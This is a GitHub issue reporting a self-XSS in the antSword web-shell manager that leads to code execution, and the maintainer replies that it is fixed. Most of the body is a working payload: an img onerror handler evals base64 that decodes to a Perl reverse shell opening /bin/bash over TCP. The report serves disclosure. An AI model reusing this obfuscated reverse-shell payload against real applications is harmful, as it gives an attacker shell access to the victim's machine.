antSword self-XSS Vulnerability leads to Code Execution #151

miaochiahao opened this issue Apr 18, 2019 · 1 comment



commented Apr 18, 2019



Screenshot 2019-04-18 6:32:40 PM


localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">

Screenshot 2019-04-18 6:33:28 PM


Screenshot 2019-04-18 6:35:07 PM


Screenshot 2019-04-18 6:35:46 PM

Please fix the self-XSS as well :D



commented Apr 18, 2019

Thanks for the feedback; this has been fixed.

@miaochiahao changed the title from "antSword self-XSS Vulnerability leads to RCE" to "antSword self-XSS Vulnerability leads to Code Execution" on Apr 18, 2019

@Medicean added this to Done in AntSword-v2.1 on Apr 26, 2019
